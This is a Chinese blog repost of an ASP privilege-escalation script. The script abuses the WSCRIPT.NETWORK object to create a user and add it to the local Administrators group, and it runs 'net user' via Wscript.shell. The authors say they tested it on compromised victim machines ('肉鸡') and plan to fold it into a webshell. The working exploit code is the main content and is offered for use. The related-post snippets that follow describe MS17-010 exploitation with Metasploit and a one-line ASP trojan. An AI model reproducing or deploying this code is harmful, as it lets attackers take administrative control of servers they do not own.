添加超级用户的.asp代码[蓝屏的原创,凯文改进,Ms未公布的漏洞]

最新推荐文章于 2023-10-25 15:23:37 发布
最新推荐文章于 2023-10-25 15:23:37 发布
阅读量1.9k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 权限提升 文章标签: input user 测试 action 脚本 blog
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/freexploit/article/details/216282
文章介绍了添加超级用户的.asp代码,此代码由蓝屏原创、凯文改进。作者和凯文在上周于肉鸡上进行测试,在user权限下成功添加Administrators组用户。代码虽正确但成功几率低,作者下一步想将其整合到海洋里。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

添加超级用户的.asp代码[蓝屏的原创,凯文改进,Ms未公布的漏洞]

作者:蓝屏,凯文 文章来源:冰点极限

其实上个礼拜我和凯文就在我的肉鸡上测试了,还有河马史诗.结果是在user权限下成功添加Administrators组的用户了(虽然我不敢相信我的眼睛).
上次凯文不发话,我不敢发布啊....现在在他的blog 上看到他发布了,就转来了咯(比我上次测试时还改进了一点,加了个表单).这下大家有福咯```

反正代码是对的,但是很少能成功,具体的看运气了。。呵呵,下一步我想把他整合到海洋里面去。嘿嘿。


<head>.network对象脚本权限提升漏洞利用工具</head>
<form action="useradd.asp" method=post>
用户:<input name="username" type="text" value="kevin1986"><br>
密码:<input name="passwd" type="password"><br>
<input type="submit" Value="添 加">
</form>

<%@codepage=936
on error resume next
if request.servervariables("REMOTE_ADDR")<>"127.0.0.1" then
response.write "iP !s n0T RiGHt"
else
if request("username")<>"" then
username=request("username")
passwd=request("passwd")
Response.Expires=0
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user",username)
od.SetPassword passwd
od.SetInfo
oe.Add oz&"/"&username
if err then
response.write "哎~~今天你还是别买6+1了……省下2元钱买瓶可乐也好……"
else
if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"上次登录")>0 then
response.write "虽然没有错误,但是好象也没建立成功.你一定很郁闷吧"
else
Response.write "OMG!"&username&"帐号居然成了!这可是未知漏洞啊.5,000,000RMB是你的了"
end if
end if
else
response.write "请输入输入用户名"
end if
end if
%>
蓝屏最小的asp木马来看C/S木马技术
生命的守望
01-15 1630
信息来源:补天网这几天狂补asp,昨天休息,无聊就把自己的东西总结了一下,突然想到了我们经常使用的C/S型的webshell,于是乎就胡乱分析了一下!呵呵!众所周知,蓝屏的最小的asp木马,服务端仅一句话:可以说是C/S型木马的极品!再看客户端:set lP=server.createObject("Adodb.Stream")lP.OpenlP.Type=2lP.CharSet="gb2312"
msf下MS17-010模块使用总结
whojoe的博客
06-20 1万+
msf下MS17-010模块使用总结前言环境搭建漏洞无杀软情况有杀软情况参考文章 前言 在去年的时候做过一次ms17010的总结,但是现在用起来发现不够详细,所以从新来总结一下。文章分为两个大部分,每个部分分为两种情况。 环境搭建 这里使用的是win2008r2,没有打补丁,之后链接克隆两台虚拟机 kali 192.168.164.155 靶机1 192.168.164.156 靶机2 192.168.164.161(丢一个360的安装包进去,等会要用) 靶机2还要开启命名管道的匿名访问 打开cmd 执行g
[ MSF使用实例 ] 利用永恒之蓝(MS17-010)漏洞导致windows靶机蓝屏并获取靶机权限
qq_51577576的博客
10-20 4391
[ MSF使用实例 ] 利用永恒之蓝(MS17-010)漏洞导致windows靶机蓝屏并获取靶机权限 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码
MS17010利用方式
最新发布
qq_54030686的博客
10-25 990
MS17010攻击利用方式
p5_第05天:基础入门-系统及数据库等
HaHa的博客
10-30 693
小迪安全笔记p5
2022 弱口令安全实验室招新赛-靶机挑战记录
qq_42077227的博客
11-16 2994
2022 弱口令安全实验室招新赛-靶机挑战记录
NSA_ms17010漏洞扫描(自检,请勿应用在非法途径上)
07-27
NSA_ms17010漏洞扫描(自检,请勿应用在非法途径上)
ms17010scan.zip
07-03
“永恒之蓝(MS17-010)”批量远程检测工具,永恒之蓝样本, 永恒之蓝病毒, 永恒之蓝解决方法.
使用ms17-010对win7进行渗透(传说中的永恒之蓝)
热门推荐
xiaopan233的博客
09-21 4万+
本实验在虚拟机环境下进行! 准备虚拟机两台: Kali Win7 64位 (要将防火墙关闭) 先看看两台机器的ip地址是多少 kali的ip是 192.168.0.102 win7的ip是192.168.0.101 接着进行端口扫描 使用kali的nmap工具进行扫描,在kali终端输入nmap –sS –sV –Pn 192.168.0.101即可进行扫描,-sS 是半开放扫...
永恒之蓝MS17010复现
weixin_30892889的博客
09-29 1238
MS17010复现 靶机win7:192.168.41.150 攻击kali: 192.168.41.147 扫描 通过auxiliary/scanner/smb/smb_ms17_010模块扫描虚拟机是否存在ms17010漏洞 存在 拿shell 通过exploit/windows/smb/ms17_010_eternalblue 直接exp打...
永恒之蓝(MS17010漏洞kali使用MSF进行漏洞复现
weixin_42540999的博客
08-19 9246
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。 恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序 今天就来利用KALI进行漏洞的复现 实验准备: 1.win7靶机(打补丁):192.168.1.141 2.kali攻击机:192
永恒之蓝漏洞自查-MS17010漏洞自查与修复
天翔空水木的专栏
07-24 3万+
MS17010漏洞时间线回溯 2017-03-12,微软发布MS17-010补丁包 2017-03-14,微软发布《MS17-010:Windows SMB 服务器安全更新说明》 https://support.microsoft.com/zh-cn/help/4012598/title 2017-04-14,Shadowbroker发布漏洞利用工具 2017-05-12晚上20 时左右,...
史上最强内网渗透知识点总结
3569
06-02 4万+
https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&amp;mid=2247487491&amp;idx=1&amp;sn=270336c6cca79b4a4e5d777d41ce71b7&amp;chksm=ec1e202bdb69a93dba0f48f973132958c95d86b2db2b6d70b8ddd1cbe41c187fa08ca4c...
MS17010(永恒之蓝)漏洞复现
plant1234的博客
11-21 1万+
MS17010(永恒之蓝)漏洞利用与复现 首先需要准备win7的环境做为靶机 获取信息 利用nmap扫描得到,靶机IP nmap -sP 192.168.229.0/24 得到: IP:192.168.229.169 然后利用: nmap --script=vuln 192.168.229.169 得到靶机信息: 发现可能利用的漏洞ms17-010 然后启动msf msfconsole 然后查找漏洞路径: search ms17-010 使用payload进行攻击: use exploit
ms17010复现
Mike_Roger的博客
01-23 8266
关于漏洞的复现干多了就发现,这种菜鸟级别的复现,,真是没有啥实用性,主要就是,自己玩玩,,,唉,,    ms17_010,好像跟什么永恒之蓝,勒索病毒有啥关系。但是,我这种小白可管不着,而且现在做的所有的复现都是基于防火墙关闭,所以,没有啥技术,复现也白复现。。。。   好了,还是讲复现:   搜索:search 17_010 很容易看出来,这个第一个方法是搜索网段中主机漏洞的,
MSF之MS12-020蓝屏攻击复现
极光时流
12-04 2432
MSF之MS12-020蓝屏攻击复现准备漏洞利用 准备 实验准备环境: 被攻击机:虚拟机win2008x64位系统,其IP为:10.101.63.66 攻击机:kali系统,其IP为:10.101.24.83 攻击工具:kali自带的msfconsole工具 漏洞利用 在kali终端中输入msfconsole msfconsole use auxiliary/dos/windows/rdp/ms...
ASP.NET用户注册页面代码详解
ASP.NET是一个用于构建动态Web应用程序的开放源代码服务器端Web应用程序框架。它由Microsoft开发并紧密集成在.NET框架中。ASP.NET允许开发者使用.NET语言(如C#和VB.NET)来编写Web页面代码,提供了构建Web应用程序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值